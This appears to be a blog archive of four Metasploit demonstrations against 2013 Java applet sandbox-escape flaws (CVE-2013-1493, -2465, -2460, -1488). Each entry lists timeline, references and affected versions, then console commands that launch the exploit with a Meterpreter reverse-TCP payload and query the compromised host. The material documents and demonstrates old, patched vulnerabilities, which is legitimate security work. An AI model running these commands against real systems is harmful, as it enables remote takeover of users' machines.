Tag Archives: Java

CVE-2013-1493 Java CMM Remote Code Execution

Timeline :

Discovered exploited in the wild in 2013-02
Metasploit PoC provided the 2013-03-26
Patched by the vendor the 2013-04-16

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-1493
OSVDB-90737
BID-58238
Oracle Security Alert for CVE-2013-1493

Affected version(s) :

Oracle Java SE 7 Update 15 and before
Oracle Java SE 6 Update 41 and before

Tested on :

Windows 7 SP1 with Java SE 7 Update 15

Description :

This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :

use exploit/windows/browser/java_cmm
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to Packet Storm by Name Withheld
Vulnerability corrected by vendor the 2013-06-18
PoC provided by Packet Storm the 2013-08-12
Metasploit PoC provided the 2013-08-19

PoC provided by :

Name Withheld
sinn3r
juan vazquez

Reference(s) :

CVE-2013-2465
OSVDB-96269
Packet Storm Exploit 2013-0811-1
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before
Oracle Java SE 6 Update 45 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses an Invalid Array Indexing Vulnerability on the static function storeImageArray() function in order to cause a memory corruption and escape the Java Sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn’t bypass click2play, has been tested successfully on Java 7u21 on Windows and Linux systems.

Commands :

use exploit/multi/browser/java_storeimagearray
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Adam Gowdiak the 2013-04-22 (Issue 61)
Vulnerability corrected by vendor the 2013-06-18
Metasploit PoC provided the 2013-06-24
PoC provided by Adam Gowdiak the 2013-07-18

PoC provided by :

Adam Gowdiak
Matthias Kaiser

Reference(s) :

CVE-2013-2460
OSVDB-94346
SE-2012-01-ORACLE-12
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Commands :

use exploit/multi/browser/java_jre17_provider_skeleton
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered, exploited by James Forshaw during Pwn2Own 2013
Vulnerability fixed by Oracle the 2013-04-16
Details on the vulnerability provided by James Forshaw the 2013-04-19
Metasploit PoC provided the 2013-06-07

PoC provided by :

James Forshaw
juan vazquez

Reference(s) :

CVE-2013-1488
OSVDB-91472
BID-58504
ZDI-13-076
Oracle Java SE Critical Patch Update Advisory – April 2013
Context Information Security Pwn2Own blog post

Affected version(s) :

JSE 7 Update 17 and before

Tested on Windows XP Pro with :

JSE 7 Update 17

Description :

This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.

Commands :

use exploit/multi/browser/java_jre17_driver_manager
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo